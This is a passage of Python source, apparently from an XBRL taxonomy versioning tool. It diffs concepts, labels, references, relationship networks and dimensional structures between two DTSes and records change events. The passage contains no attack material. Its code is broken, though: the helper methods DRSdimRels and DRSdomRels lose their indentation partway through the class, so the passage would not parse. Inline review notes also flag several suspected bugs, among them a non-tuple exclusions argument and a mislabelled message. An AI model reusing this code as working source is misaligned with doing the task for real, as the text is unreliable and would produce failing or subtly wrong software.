        facet, custom attribute, label and reference changes) for matched
        ones; all detail events for one concept share a single action.
        """
        toConceptsMatched = set()
        vercu = XbrlConst.vercu
        vercd = XbrlConst.vercd
        for fromConceptQname, fromConcept in self.fromDTS.qnameConcepts.items():
            # only XBRL items and tuples participate in the comparison
            if not fromConcept.isItem and not fromConcept.isTuple:
                continue
            toConceptQname = self.toDTSqname(fromConceptQname)
            if toConceptQname in self.toDTS.qnameConcepts:
                toConcept = self.toDTS.qnameConcepts[toConceptQname]
                toConceptsMatched.add(toConceptQname)
                # compare concepts
                action = None # keep same action for all of same concept's changes
                if fromConcept.id != toConcept.id:
                    action = self.createConceptEvent(vercd, "vercd:conceptIDChange", fromConcept, toConcept, action, fromValue=fromConcept.id, toValue=toConcept.id)
                if fromConcept.substitutionGroupQname != self.fromDTSqname(toConcept.substitutionGroupQname):
                    action = self.createConceptEvent(vercd, "vercd:conceptSubstitutionGroupChange", fromConcept, toConcept, action, fromValue=fromConcept.substitutionGroupQname, toValue=self.toDTSqname(toConcept.substitutionGroupQname))
                if fromConcept.isItem and toConcept.isItem:
                    # type comparison is mapped through namespace renames
                    if fromConcept.typeQname != self.fromDTSqname(toConcept.typeQname):
                        action = self.createConceptEvent(vercd, "vercd:conceptTypeChange", fromConcept, toConcept, action, fromValue=fromConcept.typeQname, toValue=toConcept.typeQname)
                if fromConcept.nillable != toConcept.nillable:
                    action = self.createConceptEvent(vercd, "vercd:conceptNillableChange", fromConcept, toConcept, action, fromValue=fromConcept.nillable, toValue=toConcept.nillable)
                if fromConcept.abstract != toConcept.abstract:
                    action = self.createConceptEvent(vercd, "vercd:conceptAbstractChange", fromConcept, toConcept, action, fromValue=fromConcept.abstract, toValue=toConcept.abstract)
                if fromConcept.isItem and toConcept.isItem:
                    # item-only facets
                    if fromConcept.block != toConcept.block:
                        action = self.createConceptEvent(vercd, "vercd:conceptBlockChange", fromConcept, toConcept, action, fromValue=fromConcept.block, toValue=toConcept.block)
                    if fromConcept.default != toConcept.default:
                        action = self.createConceptEvent(vercd, "vercd:conceptDefaultChange", fromConcept, toConcept, action, fromValue=fromConcept.default, toValue=toConcept.default)
                    if fromConcept.fixed != toConcept.fixed:
                        action = self.createConceptEvent(vercd, "vercd:conceptFixedChange", fromConcept, toConcept, action, fromValue=fromConcept.fixed, toValue=toConcept.fixed)
                    if fromConcept.final != toConcept.final:
                        action = self.createConceptEvent(vercd, "vercd:conceptFinalChange", fromConcept, toConcept, action, fromValue=fromConcept.final, toValue=toConcept.final)
                    if fromConcept.periodType != toConcept.periodType:
                        action = self.createConceptEvent(vercd, "vercd:conceptPeriodTypeChange", fromConcept, toConcept, action, fromValue=fromConcept.periodType, toValue=toConcept.periodType)
                    if fromConcept.balance != toConcept.balance:
                        action = self.createConceptEvent(vercd, "vercd:conceptBalanceChange", fromConcept, toConcept, action, fromValue=fromConcept.balance, toValue=toConcept.balance)
                if fromConcept.isTuple and toConcept.isTuple:
                    fromType = fromConcept.type # it is null for xsd:anyType
                    toType = toConcept.type
                    # TBD change to xml comparison with namespaceURI mappings, prefixes ignored
                    if (fromType is not None and toType is not None and
                        not XbrlUtil.nodesCorrespond(self.fromDTS, fromType, toType, self.toDTS)):
                        action = self.createConceptEvent(vercd, "vercd:tupleContentModelChange", fromConcept, toConcept, action)
                # custom attributes in from Concept
                fromCustAttrs = {}
                toCustAttrs = {}
                for concept, attrs in ((fromConcept,fromCustAttrs),(toConcept,toCustAttrs)):
                    for attrName, attrValue in concept.items():
                        attrQname = qname(attrName)
                        # skip standard schema attributes and xbrli/xbrldt attributes
                        if (attrName not in ("abstract","block","default","final","fixed","form","id","maxOccurs",
                                             "minOccurs","name","nillable","ref","substitutionGroup","type") and
                            attrQname.namespaceURI != XbrlConst.xbrli and
                            attrQname.namespaceURI != XbrlConst.xbrldt):
                            attrs[concept.prefixedNameQname(attrQname)] = attrValue
                for attr in fromCustAttrs.keys():
                    if attr not in toCustAttrs:
                        action = self.createConceptEvent(vercd, "vercd:conceptAttributeDelete", fromConcept, None, action, fromCustomAttribute=attr, fromValue=fromCustAttrs[attr])
                    elif fromCustAttrs[attr] != toCustAttrs[attr]:
                        action = self.createConceptEvent(vercd, "vercd:conceptAttributeChange", fromConcept, toConcept, action, fromCustomAttribute=attr, toCustomAttribute=attr, fromValue=fromCustAttrs[attr], toValue=toCustAttrs[attr])
                for attr in toCustAttrs.keys():
                    if attr not in fromCustAttrs:
                        action = self.createConceptEvent(vercd, "vercd:conceptAttributeAdd", None, toConcept, action, toCustomAttribute=attr, toValue=toCustAttrs[attr])
                # labels, references from each concept
                for event, arcroles in (("vercd:conceptLabel", (XbrlConst.conceptLabel, XbrlConst.elementLabel)),
                                        ("vercd:conceptReference", (XbrlConst.conceptReference, XbrlConst.elementReference))):
                    fromResources = {}
                    toResources = {}
                    # key each resource by its linkage and identifying attributes
                    for dts, concept, resources in ((self.fromDTS, fromConcept, fromResources),
                                                    (self.toDTS, toConcept, toResources)):
                        for arcrole in arcroles:
                            resourcesRelationshipSet = dts.relationshipSet(arcrole)
                            if resourcesRelationshipSet:
                                for rel in resourcesRelationshipSet.fromModelObject(concept):
                                    resource = rel.toModelObject
                                    # NOTE(review): exclusions=(XbrlConst.xlink) below is not a tuple
                                    # — looks like it should be (XbrlConst.xlink,); confirm against XbrlUtil.attributes
                                    key = (rel.linkrole, arcrole, resource.role, resource.xmlLang,
                                           rel.linkQname, rel.qname, resource.qname) + \
                                           XbrlUtil.attributes(dts, rel.arcElement,
                                                exclusions=(XbrlConst.xlink, "use","priority","order","id")) + \
                                           XbrlUtil.attributes(dts, resource,
                                                exclusions=(XbrlConst.xlink))
                                    resources[key] = resource
                    for key,label in fromResources.items():
                        fromText = XmlUtil.innerText(label)
                        if key not in toResources:
                            action = self.createConceptEvent(vercd, event + "Delete", fromConcept, None, action, fromResource=label, fromResourceText=fromText)
                        else:
                            toLabel = toResources[key]
                            toText = XmlUtil.innerText(toLabel)
                            # structural comparison ignoring ids, mapping to-DTS namespaces back to from-DTS
                            if not XbrlUtil.sEqual(self.fromDTS, label, toLabel, excludeIDs=XbrlUtil.ALL_IDs_EXCLUDED, dts2=self.toDTS, ns2ns1Tbl=self.namespaceRenameToURI):
                                action = self.createConceptEvent(vercd, event + "Change", fromConcept, toConcept, action, fromResource=label, toResource=toResources[key], fromResourceText=fromText, toResourceText=toText)
                    for key,label in toResources.items():
                        toText = XmlUtil.innerText(label)
                        if key not in fromResources:
                            action = self.createConceptEvent(vercd, event + "Add", None, toConcept, action, toResource=label, toResourceText=toText)
                #
            else:
                # no corresponding concept in the to DTS: it was deleted
                self.createConceptEvent(vercu, "vercu:conceptDelete", fromConcept=fromConcept)
        for toConceptQname, toConcept in self.toDTS.qnameConcepts.items():
            # concepts only present in the to DTS were added
            if ((toConcept.isItem or toConcept.isTuple) and
                toConceptQname not in toConceptsMatched):
                self.createConceptEvent(vercu, "vercu:conceptAdd", toConcept=toConcept)
    def diffRelationshipSet(self, arcrole):
        """Report versioning events for the relationship networks of *arcrole*.

        First collects the link role URIs used with the arc role in each DTS,
        then reports whole networks that exist in only one DTS
        (relationshipSetModelDelete/Add) and, for link roles present in both
        DTSes (or mapped by a recorded role change), compares the two
        hierarchies root by root via diffRelationships.
        """
        # compare ELRs for new/removed
        fromLinkRoleUris = set()
        toLinkRoleUris = set()
        for dts, linkRoleUris in ((self.fromDTS, fromLinkRoleUris),
                                  (self.toDTS, toLinkRoleUris) ):
            for linkroleUri in dts.relationshipSet(arcrole).linkRoleUris:
                linkRoleUris.add(linkroleUri)
        # removed, added ELRs
        for dts, linkRoleUris, otherRoleUris, roleChanges, e1, e2, isFrom in (
              (self.fromDTS, fromLinkRoleUris, toLinkRoleUris, self.roleChangeFromURI, "relationshipSetModelDelete", "fromRelationshipSet", True),
              (self.toDTS, toLinkRoleUris, fromLinkRoleUris, self.roleChangeToURI, "relationshipSetModelAdd", "toRelationshipSet", False)):
            for linkRoleUri in linkRoleUris:
                if not (linkRoleUri in otherRoleUris or linkRoleUri in roleChanges):
                    # fromUri tree is removed
                    # lazily create the enclosing model/set events only when the
                    # network actually has root concepts
                    relSetEvent = None
                    relationshipSet = dts.relationshipSet(arcrole, linkRoleUri)
                    for rootConcept in relationshipSet.rootConcepts:
                        if relSetEvent is None:
                            relSetMdlEvent = self.createRelationshipSetEvent(e1)
                            relSetEvent = self.createRelationshipSetEvent(e2, eventParent=relSetMdlEvent)
                        rs = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=linkRoleUri, arcrole=arcrole)
                        self.createRelationshipSetEvent("relationships", eventParent=rs, fromConcept=rootConcept, axis="descendant-or-self", comment="root relationship")
                elif isFrom: # role in both, compare hierarchies
                    # these fields are created lazily by diffRelationships; reset
                    # them before comparing each link role's hierarchies
                    self.relSetAddedEvent = None
                    self.relSetDeletedEvent = None
                    otherLinkRoleUri = roleChanges[linkRoleUri] if linkRoleUri in roleChanges else linkRoleUri
                    fromRelationshipSet = dts.relationshipSet(arcrole, linkRoleUri)
                    toRelationshipSet = self.toDTS.relationshipSet(arcrole, otherLinkRoleUri)
                    fromRoots = fromRelationshipSet.rootConcepts
                    toRoots = toRelationshipSet.rootConcepts
                    for fromRoot in fromRoots:
                        toRootConcept = self.toDTS.qnameConcepts.get(self.toDTSqname(fromRoot.qname))
                        if toRootConcept is not None and toRootConcept not in toRoots: # added qname
                            if self.relSetDeletedEvent is None:
                                relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelDelete")
                                relSetEvent = self.createRelationshipSetEvent("fromRelationshipSet", eventParent=relSetMdlEvent)
                                self.relSetDeletedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=linkRoleUri, arcrole=arcrole)
                            self.createRelationshipSetEvent("relationships", eventParent=self.relSetDeletedEvent, fromConcept=fromRoot, axis="descendant-or-self")
                        else:
                            # check hierarchies
                            # NOTE(review): toRootConcept may be None here (no
                            # counterpart concept in toDTS) - confirm that
                            # diffRelationships handles a None toConcept as intended
                            self.diffRelationships(fromRoot, toRootConcept, fromRelationshipSet, toRelationshipSet)
                    for toRoot in toRoots:
                        fromRootConcept = self.fromDTS.qnameConcepts.get(self.fromDTSqname(toRoot.qname))
                        if fromRootConcept is not None and fromRootConcept not in fromRoots: # added qname
                            if self.relSetAddedEvent is None:
                                relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelAdd")
                                relSetEvent = self.createRelationshipSetEvent("toRelationshipSet", eventParent=relSetMdlEvent)
                                self.relSetAddedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=toRelationshipSet.linkrole, arcrole=toRelationshipSet.arcrole)
                            self.createRelationshipSetEvent("relationships", eventParent=self.relSetAddedEvent, fromConcept=toRoot, axis="descendant-or-self", comment="root relationship")
    def diffRelationships(self, fromConcept, toConcept, fromRelationshipSet, toRelationshipSet):
        """Recursively compare the relationships descending from a pair of
        corresponding concepts, reporting arc-attribute changes, deletions
        (fromDTS-only arcs) and additions (toDTS-only arcs).

        Relationships are paired positionally (i-th from-arc against i-th
        to-arc).  The lazily-created self.relSetDeletedEvent and
        self.relSetAddedEvent elements are reset by the caller
        (diffRelationshipSet) before each link role is compared.
        """
        fromRels = fromRelationshipSet.fromModelObject(fromConcept)
        toRels = toRelationshipSet.fromModelObject(toConcept)
        for i, fromRel in enumerate(fromRels):
            fromTgtConcept = fromRel.toModelObject
            toTgtQname = self.toDTSqname(fromTgtConcept.qname) if fromTgtConcept is not None else None
            toRel = toRels[i] if i < len(toRels) else None
            if toRel is not None and isinstance(toRel.toModelObject, ModelConcept) and toRel.toModelObject.qname == toTgtQname:
                # targets correspond: compare the arcs' attributes (excluding
                # the standard relationship-set arc attributes)
                fromRelAttrs = XbrlUtil.attributes(self.modelXbrl, fromRel.arcElement,
                                                   exclusions=relationshipSetArcAttributesExclusion)
                toRelAttrs = XbrlUtil.attributes(self.modelXbrl, toRel.arcElement,
                                                 exclusions=relationshipSetArcAttributesExclusion,
                                                 ns2ns1Tbl=self.namespaceRenameToURI)
                if fromRelAttrs != toRelAttrs:
                    # attribute change: report each side's attributes that the
                    # other side lacks (set differences)
                    fromAttrsSet = set(fromRelAttrs)
                    toAttrsSet = set(toRelAttrs)
                    relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelChange")
                    relSetEvent = self.createRelationshipSetEvent("fromRelationshipSet", eventParent=relSetMdlEvent)
                    relSetChangedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=fromRelationshipSet.linkrole, arcrole=fromRelationshipSet.arcrole)
                    self.createRelationshipSetEvent("relationships", eventParent=relSetChangedEvent, fromConcept=fromConcept, toConcept=fromTgtConcept, attrValues=fromAttrsSet-toAttrsSet)
                    relSetEvent = self.createRelationshipSetEvent("toRelationshipSet", eventParent=relSetMdlEvent)
                    relSetChangedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=toRelationshipSet.linkrole, arcrole=toRelationshipSet.arcrole)
                    self.createRelationshipSetEvent("relationships", eventParent=relSetChangedEvent, fromConcept=toConcept, toConcept=toRel.toModelObject, attrValues=toAttrsSet-fromAttrsSet)
                else:
                    # arcs identical: descend into the corresponding subtrees
                    self.diffRelationships(fromTgtConcept, toRel.toModelObject, fromRelationshipSet, toRelationshipSet)
            else:
                # no positionally-corresponding to-arc: report the fromDTS
                # relationship as deleted
                if self.relSetDeletedEvent is None:
                    relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelDelete")
                    relSetEvent = self.createRelationshipSetEvent("fromRelationshipSet", eventParent=relSetMdlEvent)
                    self.relSetDeletedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=fromRelationshipSet.linkrole, arcrole=fromRelationshipSet.arcrole)
                if toRel is not None:
                    comment = _('corresponding relationship {0} toDTS toName="{1}"').format(i+1, XmlUtil.addQnameValue(self.reportElement, toRel.toModelObject.qname))
                else:
                    comment = _('toDTS does not have a corresponding relationship at position {0}').format(i+1)
                self.createRelationshipSetEvent("relationships", eventParent=self.relSetDeletedEvent, fromConcept=fromConcept, toConcept=fromTgtConcept, comment=comment)
        for i, toRel in enumerate(toRels):
            # arcs present only in the toDTS (or targeting a different concept
            # at the same position) are reported as additions
            toTgtConcept = toRel.toModelObject
            fromTgtQname = self.fromDTSqname(toTgtConcept.qname) if isinstance(toRel.toModelObject, ModelConcept) else None
            fromRel = fromRels[i] if i < len(fromRels) else None
            if fromRel is None or not isinstance(fromRel.toModelObject, ModelConcept) or fromRel.toModelObject.qname != fromTgtQname:
                if self.relSetAddedEvent is None:
                    relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelAdd")
                    relSetEvent = self.createRelationshipSetEvent("toRelationshipSet", eventParent=relSetMdlEvent)
                    self.relSetAddedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=toRelationshipSet.linkrole, arcrole=toRelationshipSet.arcrole)
                if fromRel is not None:
                    # NOTE(review): this message says 'toDTS toName' but formats
                    # the fromDTS relationship's target - looks copy-pasted from
                    # the deletion branch above; confirm intended wording
                    comment = _('corresponding relationship {0} toDTS toName="{1}"').format(i+1, XmlUtil.addQnameValue(self.reportElement, fromRel.toModelObject.qname))
                else:
                    comment = _('fromDTS does not have a corresponding relationship at position {0}').format(i+1)
                self.createRelationshipSetEvent("relationships", eventParent=self.relSetAddedEvent, fromConcept=toConcept, toConcept=toTgtConcept, comment=comment)
    def diffDimensionDefaults(self):
        """Report aspect-model events for dimension-default relationships that
        exist in only one DTS or whose default member changed.

        The two iterations of the outer loop are symmetric: the first reports
        fromDTS-only defaults as aspectModelDelete/fromAspects, the second
        reports toDTS-only defaults as aspectModelAdd/toAspects.
        """
        # dimension-defaults are global
        fromDimDefaults = {}
        toDimDefaults = {}
        for dts, dimDefaults in ((self.fromDTS, fromDimDefaults),
                                 (self.toDTS, toDimDefaults) ):
            # map dimension qname -> default member qname, per DTS
            for rel in dts.relationshipSet(XbrlConst.dimensionDefault).modelRelationships:
                dimDefaults[rel.fromModelObject.qname] = rel.toModelObject.qname
        # removed, added defaults
        for dts, dimDefaults, otherDimDefaults, otherDTSqname, e1, e2 in (
              (self.fromDTS, fromDimDefaults, toDimDefaults, self.toDTSqname, "aspectModelDelete", "fromAspects"),
              (self.toDTS, toDimDefaults, fromDimDefaults, self.fromDTSqname, "aspectModelAdd", "toAspects")):
            aspectEvent = None
            for fromDimQname, fromDefaultQname in dimDefaults.items():
                otherDTSDimQname = otherDTSqname(fromDimQname)
                otherDTSDefaultQname = otherDTSqname(fromDefaultQname)
                if otherDTSDimQname not in otherDimDefaults or otherDimDefaults[otherDTSDimQname] != otherDTSDefaultQname:
                    # dim default is removed
                    if aspectEvent is None:
                        # lazily create the enclosing aspect model event once
                        aspectMdlEvent = self.createInstanceAspectsEvent(e1)
                        aspectEvent = self.createInstanceAspectsEvent(e2, eventParent=aspectMdlEvent)
                    explDim = self.createInstanceAspectsEvent("explicitDimension", (('name',fromDimQname),), eventParent=aspectEvent)
                    # removed isDefault per Vers WG e-mail from Richard Ashby 2012-07-11
                    # self.createInstanceAspectsEvent("member", (('name',fromDefaultQname),('isDefaultMember','true')), eventParent=explDim, comment="dimension default")
    def diffDimensions(self):
        """Report aspect-model (dimensions) versioning events.

        Builds, per DTS, the DRS relationships keyed by (primary item qname,
        link role) of the has-hypercube arcs; then reports primary items whose
        whole DRS exists in only one DTS, and for primary items present in
        both DTSes compares hypercube arcs (DRShcDiff), the primary item's
        domain-member network (DRSdiff), and dimensions with their members
        (DRSdimsDiff), emitting aspectModelDelete/Add/Change events.
        """
        # DRS rels by (primary item,linkrole) of the has-hypercube relationship
        fromDRSrels = defaultdict(list)
        toDRSrels = defaultdict(list)
        for dts, DRSrels in ((self.fromDTS, fromDRSrels), (self.toDTS, toDRSrels)):
            for hasHcArcrole in (XbrlConst.all, XbrlConst.notAll):
                for DRSrel in dts.relationshipSet(hasHcArcrole).modelRelationships:
                    if isinstance(DRSrel.fromModelObject, ModelConcept):
                        DRSrels[DRSrel.fromModelObject.qname,DRSrel.linkrole].append( DRSrel )
        # removed, added pri item dimensions
        # two symmetric passes: from-perspective (deletions) then to-perspective (additions)
        for dts, DRSrels, otherDTS, otherDRSrels, otherDTSqname, roleChanges, e1, e2, isFrom in (
              (self.fromDTS, fromDRSrels, self.toDTS, toDRSrels, self.toDTSqname, self.roleChangeFromURI, "aspectModelDelete", "fromAspects", True),
              (self.toDTS, toDRSrels, self.fromDTS, fromDRSrels, self.fromDTSqname, self.roleChangeToURI, "aspectModelAdd", "toAspects", False)):
            aspectEvent = None
            for DRSkey, priItemDRSrels in DRSrels.items():
                priItemQname, linkrole = DRSkey
                priItemConcept = dts.qnameConcepts.get(priItemQname)
                otherDTSpriItemQname = otherDTSqname(priItemQname)
                otherDTSpriItemConcept = otherDTS.qnameConcepts.get(otherDTSpriItemQname)
                otherLinkrole = roleChanges[linkrole] if linkrole in roleChanges else linkrole
                otherDTSpriItemDRSrels = otherDRSrels.get((otherDTSpriItemQname, otherLinkrole))
                # all dimensions in these DRSes are anded together
                addDelEvent = changeEvent = False  # NOTE(review): these flags are never read below
                if not otherDTSpriItemDRSrels: #every dim for this pri item is added/removed
                    aspectMdlEvent = self.createInstanceAspectsEvent(e1)
                    aspectEvent = self.createInstanceAspectsEvent(e2, eventParent=aspectMdlEvent)
                    priItemInheritRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
                    relatedConcepts = self.createInstanceAspectsEvent("concepts", eventParent=aspectEvent)
                    priItem = self.createInstanceAspectsEvent("concept", (('name',priItemQname),), eventParent=relatedConcepts)
                    if priItemInheritRels:
                        # primary item heads a domain-member network: reference it by axis
                        priItemNetwork = self.createInstanceAspectsEvent("drsNetwork",
                                                                         (('linkrole',linkrole),
                                                                          ('arcrole',XbrlConst.domainMember),
                                                                          ('axis', 'descendant-or-self')),
                                                                         eventParent=priItem)
                    for dimRel, isNotAll, isClosed in self.DRSdimRels(dts, priItemDRSrels):
                        dimConcept = dimRel.toModelObject
                        explDim = self.createInstanceAspectsEvent("typedDimension" if dimConcept.isTypedDimension else "explicitDimension",
                                                                  (('name',dimConcept.qname),) + \
                                                                  ((('excluded','true'),) if isNotAll else ()),
                                                                  comment=self.typedDomainElementComment(dimConcept),
                                                                  eventParent=aspectEvent)
                        for domRel in self.DRSdomRels(dts, dimRel):
                            domHasMemRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
                            member = self.createInstanceAspectsEvent("member", (('name',domRel.toModelObject.qname),), eventParent=explDim)
                            if domHasMemRels:
                                self.createInstanceAspectsEvent("drsNetwork",
                                                                (('linkrole',domRel.linkrole),
                                                                 ('arcrole',XbrlConst.domainMember),
                                                                 ('axis', 'descendant-or-self')),
                                                                eventParent=member)
                elif isFrom: # pri item in both, differences are found
                    # hypercube differences
                    hcDifferences = self.DRShcDiff(dts, priItemDRSrels, otherDTS, otherDTSpriItemDRSrels)
                    if hcDifferences:
                        relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelChange")
                        for fromHcRel, toHcRel, fromAttrsSet, toAttrsSet in hcDifferences:
                            relSetEvent = self.createRelationshipSetEvent("fromRelationshipSet", eventParent=relSetMdlEvent)
                            relSetChangedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=fromHcRel.linkrole, arcrole=fromHcRel.arcrole)
                            self.createRelationshipSetEvent("relationships", eventParent=relSetChangedEvent, fromConcept=fromHcRel.fromModelObject, toConcept=fromHcRel.toModelObject, attrValues=fromAttrsSet-toAttrsSet)
                            relSetEvent = self.createRelationshipSetEvent("toRelationshipSet", eventParent=relSetMdlEvent)
                            relSetChangedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=toHcRel.linkrole, arcrole=toHcRel.arcrole)
                            self.createRelationshipSetEvent("relationships", eventParent=relSetChangedEvent, fromConcept=toHcRel.toModelObject, toConcept=toHcRel.toModelObject, attrValues=toAttrsSet-fromAttrsSet)
                    # differences in the primary item's own member network
                    priItemDifferences = self.DRSdiff(priItemConcept, linkrole, otherDTSpriItemConcept, otherLinkrole, XbrlConst.domainMember)
                    if priItemDifferences:
                        for fromRel, toRel, fromAttrSet, toAttrSet in priItemDifferences:
                            # event name depends on which side(s) the relationship exists in
                            if fromRel is not None:
                                if toRel is not None: e = "aspectModelChange"
                                else: e = "aspectModelDelete"
                            else: e = "aspectModelAdd"
                            aspectMdlEvent = self.createInstanceAspectsEvent(e)
                            for priQn, rel, attrSet, e in ((priItemQname, fromRel, fromAttrSet-toAttrSet, "fromAspects"),
                                                           (otherDTSpriItemQname, toRel, toAttrSet-fromAttrSet, "toAspects")):
                                if rel is not None:
                                    aspectEvent = self.createInstanceAspectsEvent(e, eventParent=aspectMdlEvent)
                                    priItemInheritRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
                                    relatedConcepts = self.createInstanceAspectsEvent("concepts", eventParent=aspectEvent)
                                    priItem = self.createInstanceAspectsEvent("concept", (('name',priQn),), eventParent=relatedConcepts)
                                    if priItemInheritRels:
                                        self.createInstanceAspectsEvent("drsNetwork",
                                                                        (('linkrole',rel.linkrole),
                                                                         ('arcrole',XbrlConst.domainMember),
                                                                         ('axis', 'descendant-or-self')),
                                                                        eventParent=priItem)
                                    for dimRel, isNotAll, isClosed in self.DRSdimRels(dts, priItemDRSrels):
                                        dimConcept = dimRel.toModelObject
                                        explDim = self.createInstanceAspectsEvent("typedDimension" if dimConcept.isTypedDimension else "explicitDimension",
                                                                                  (('name',dimConcept.qname),) + \
                                                                                  ((('excluded','true'),) if isNotAll else ()),
                                                                                  comment=self.typedDomainElementComment(dimConcept),
                                                                                  eventParent=aspectEvent)
                                        for domRel in self.DRSdomRels(dts, dimRel):
                                            domHasMemRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
                                            member = self.createInstanceAspectsEvent("member", (('name',domRel.toModelObject.qname),), eventParent=explDim)
                                            if domHasMemRels:
                                                self.createInstanceAspectsEvent("drsNetwork",
                                                                                (('linkrole',rel.linkrole),
                                                                                 ('arcrole',XbrlConst.domainMember),
                                                                                 ('axis', 'descendant-or-self')),
                                                                                eventParent=member)
                    # differences in the dimensions and their members
                    dimsDifferences = self.DRSdimsDiff(dts, priItemDRSrels, otherDTS, otherDTSpriItemDRSrels)
                    if dimsDifferences:
                        for fromDimRel, toDimRel, isNotAll, mbrDiffs in dimsDifferences:
                            if fromDimRel is not None:
                                if toDimRel is not None: e = "aspectModelChange"
                                else: e = "aspectModelDelete"
                            else: e = "aspectModelAdd"
                            aspectMdlEvent = self.createInstanceAspectsEvent(e)
                            for priQn, dimRel, e, isFrom in ((priItemQname, fromDimRel, "fromAspects", True),
                                                             (otherDTSpriItemQname, toDimRel, "toAspects", False)):
                                if dimRel is not None:
                                    aspectEvent = self.createInstanceAspectsEvent(e, eventParent=aspectMdlEvent)
                                    priItemInheritRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
                                    relatedConcepts = self.createInstanceAspectsEvent("concepts", eventParent=aspectEvent)
                                    priItem = self.createInstanceAspectsEvent("concept", (('name',priQn),), eventParent=relatedConcepts)
                                    if priItemInheritRels:
                                        self.createInstanceAspectsEvent("drsNetwork",
                                                                        (('linkrole',linkrole),
                                                                         ('arcrole',XbrlConst.domainMember),
                                                                         ('axis', 'descendant-or-self')),
                                                                        eventParent=priItem)
                                    dimConcept = dimRel.toModelObject
                                    explDim = self.createInstanceAspectsEvent("typedDimension" if dimConcept.isTypedDimension else "explicitDimension",
                                                                              (('name',dimConcept.qname),) + \
                                                                              ((('excluded','true'),) if isNotAll else ()),
                                                                              comment=self.typedDomainElementComment(dimConcept),
                                                                              eventParent=aspectEvent)
                                    if mbrDiffs:
                                        # report only the differing members for this side
                                        for fromRel, toRel, fromAttrSet, toAttrSet in mbrDiffs:
                                            if isFrom: rel = fromRel
                                            else: rel = toRel
                                            if rel is not None:
                                                domHasMemRels = dts.relationshipSet(XbrlConst.domainMember, rel.linkrole).fromModelObject(rel.toModelObject)
                                                member = self.createInstanceAspectsEvent("member", (('name',rel.toModelObject.qname),), eventParent=explDim)
                                                if domHasMemRels:
                                                    self.createInstanceAspectsEvent("drsNetwork",
                                                                                    (('linkrole',rel.linkrole),
                                                                                     ('arcrole',XbrlConst.domainMember),
                                                                                     ('axis', 'descendant-or-self')),
                                                                                    eventParent=member)
                                    else:
                                        # no member-level diffs: list the whole domain
                                        for domRel in self.DRSdomRels(dts, dimRel):
                                            domHasMemRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
                                            self.createInstanceAspectsEvent("member", (('name',domRel.toModelObject.qname),) + \
                                                                            ((('linkrole',domRel.linkrole),
                                                                              ('arcrole',XbrlConst.domainMember),
                                                                              ('axis', 'DRS-descendant-or-self')) if domHasMemRels else ()),
                                                                            eventParent=explDim)
def DRSdimRels(self, dts, priItemDRSrels):
return [(dimRel, hcRel.arcrole == XbrlConst.notAll, hcRel.isClosed)
for hcRel in priItemDRSrels
for dimRel in dts.relationshipSet(XbrlConst.hypercubeDimension, hcRel.consecutiveLinkrole).fromModelObject(hcRel.toModelObject)]
def DRSdomRels(self, dts, dimRel):
return dts.relationshipSet(XbrlConst.dimensionDomain, dimRel.consecutiveLinkrole).fromModelObject(dimRel.toModelObject)
    def DRSdiff(self, fromConcept, fromLinkrole, toConcept, toLinkrole, arcrole, diffs=None):
        """Recursively compare the DRS networks descending from a pair of
        corresponding concepts.

        Relationships are paired positionally; the accumulated *diffs* list of
        (fromRel, toRel, fromAttrs, toAttrs) tuples is returned, where a None
        member marks a relationship present in only one DTS.
        """
        if diffs is None: diffs = []
        fromRels = self.fromDTS.relationshipSet(arcrole, fromLinkrole).fromModelObject(fromConcept)
        toRels = self.toDTS.relationshipSet(arcrole, toLinkrole).fromModelObject(toConcept)
        if arcrole == XbrlConst.dimensionDomain: arcrole = XbrlConst.domainMember #consec rel set
        for i, fromRel in enumerate(fromRels):
            fromTgtConcept = fromRel.toModelObject
            toTgtQname = self.toDTSqname(fromTgtConcept.qname) if fromTgtConcept is not None else None
            toRel = toRels[i] if i < len(toRels) else None
            if toRel is not None and isinstance(toRel.toModelObject, ModelConcept) and toRel.toModelObject.qname == toTgtQname:
                # targets correspond: compare arc attributes, then recurse
                toTgtConcept = toRel.toModelObject
                fromRelAttrs = XbrlUtil.attributes(self.modelXbrl, fromRel.arcElement,
                                                   exclusions=relationshipSetArcAttributesExclusion)
                toRelAttrs = XbrlUtil.attributes(self.modelXbrl, toRel.arcElement,
                                                 exclusions=relationshipSetArcAttributesExclusion,
                                                 ns2ns1Tbl=self.namespaceRenameToURI)
                if fromRelAttrs != toRelAttrs:
                    diffs.append((fromRel, toRel, set(fromRelAttrs), set(toRelAttrs)))
                else:
                    # unchanged arc: descend following each arc's consecutive link role
                    self.DRSdiff(fromTgtConcept, fromRel.consecutiveLinkrole,
                                 toTgtConcept, toRel.consecutiveLinkrole,
                                 arcrole, diffs)
            else:
                # fromDTS-only relationship
                diffs.append((fromRel, None, set(), set()))
        for i, toRel in enumerate(toRels):
            # toDTS-only relationships (or different target at same position)
            toTgtConcept = toRel.toModelObject
            fromTgtQname = self.fromDTSqname(toTgtConcept.qname) if isinstance(toRel.toModelObject, ModelConcept) else None
            fromRel = fromRels[i] if i < len(fromRels) else None
            if fromRel is None or not isinstance(fromRel.toModelObject, ModelConcept) or fromRel.toModelObject.qname != fromTgtQname:
                diffs.append((None, toRel, set(), set()))
